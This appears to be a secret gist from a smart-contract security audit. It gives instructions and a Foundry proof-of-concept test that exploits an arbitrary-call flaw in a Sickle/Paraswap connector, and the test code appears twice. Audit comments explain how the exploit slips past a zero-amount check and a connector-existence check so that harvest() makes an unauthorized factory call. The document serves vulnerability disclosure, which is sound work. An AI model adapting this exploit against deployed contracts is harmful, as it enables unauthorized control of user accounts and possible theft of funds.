DrasticWatermelon/instructions.txt Secret

## instructions.txt
1. Add the test case to `test/strategies/PrismaConnector.t.sol`
2. Execute with `forge t --mt test_ArbitraryCallPOC -vvv`

At the end, the test asserts that the user's Sickle is now an owner of a Sickle

## poc.sol
function test_ArbitraryCallPOC() external prank {
  CurvePool[] memory curvePools = getCurvePools();
  whitelistCurve(curvePools);
  vm.startPrank(sickleOwner);

  ParaswapExtraData memory payload = ParaswapExtraData({
    target: address(ctx.factory),
    data: abi.encodeCall(SickleFactory.deploy, (address(0xdeadbeef), bytes32(hex"abcdabcd")))
  });

  // 1. Create call params to target ParaswapConnector
  SwapData[] memory swap = new SwapData[](1);
  swap[0] = SwapData({
    router: Mainnet.PARASWAP_TOKEN_TRANSFER_PROXY,
    tokenIn: Mainnet.WETH, // AUDIT not important
    amountIn: 1, // AUDIT needs to bypass 0 zero
    minAmountOut: 0, // AUDIT not important
    extraData: abi.encode(payload)
  });

  ZapModule.ZapOutData memory zapData = ZapModule.ZapOutData({
    removeLiquidityData: RemoveLiquidityData({
      router: address(0),
      lpToken: address(0),
      tokens: new address[](0),
      lpAmountIn: 0,
      minAmountsOut: new uint256[](0),
      extraData: ""
    }),
    swaps: swap, // TODO this is important for the exploit
    tokenOut: ETH
  });

  // 2. Execute farmStrategy.harvest(pool, harvestData, "")
  farmStrategy.harvest(
    curvePools[0].pool, // AUDIT sets a random, registered, target to bypass connector existence check
    zapData,
    ""
  );

  // 3. Verify the Sickle is owner of a Sickle
  address usersSickle = ctx.factory.sickles(sickleOwner);
  assertTrue(usersSickle != address(0), "User isn't admin of a sickle");

  address sicklesSickle = ctx.factory.sickles(usersSickle);
  assertTrue(sicklesSickle != address(0), "Sickles isn't admin of a sickle");

}
	1. Add the test case to `test/strategies/PrismaConnector.t.sol`
	2. Execute with `forge t --mt test_ArbitraryCallPOC -vvv`

	At the end, the test asserts that the user's Sickle is now an owner of a Sickle
	function test_ArbitraryCallPOC() external prank {
	CurvePool[] memory curvePools = getCurvePools();
	whitelistCurve(curvePools);
	vm.startPrank(sickleOwner);

	ParaswapExtraData memory payload = ParaswapExtraData({
	target: address(ctx.factory),
	data: abi.encodeCall(SickleFactory.deploy, (address(0xdeadbeef), bytes32(hex"abcdabcd")))
	});

	// 1. Create call params to target ParaswapConnector
	SwapData[] memory swap = new SwapData[](1);
	swap[0] = SwapData({
	router: Mainnet.PARASWAP_TOKEN_TRANSFER_PROXY,
	tokenIn: Mainnet.WETH, // AUDIT not important
	amountIn: 1, // AUDIT needs to bypass 0 zero
	minAmountOut: 0, // AUDIT not important
	extraData: abi.encode(payload)
	});

	ZapModule.ZapOutData memory zapData = ZapModule.ZapOutData({
	removeLiquidityData: RemoveLiquidityData({
	router: address(0),
	lpToken: address(0),
	tokens: new address[](0),
	lpAmountIn: 0,
	minAmountsOut: new uint256[](0),
	extraData: ""
	}),
	swaps: swap, // TODO this is important for the exploit
	tokenOut: ETH
	});

	// 2. Execute farmStrategy.harvest(pool, harvestData, "")
	farmStrategy.harvest(
	curvePools[0].pool, // AUDIT sets a random, registered, target to bypass connector existence check
	zapData,
	""
	);

	// 3. Verify the Sickle is owner of a Sickle
	address usersSickle = ctx.factory.sickles(sickleOwner);
	assertTrue(usersSickle != address(0), "User isn't admin of a sickle");

	address sicklesSickle = ctx.factory.sickles(usersSickle);
	assertTrue(sicklesSickle != address(0), "Sickles isn't admin of a sickle");

	}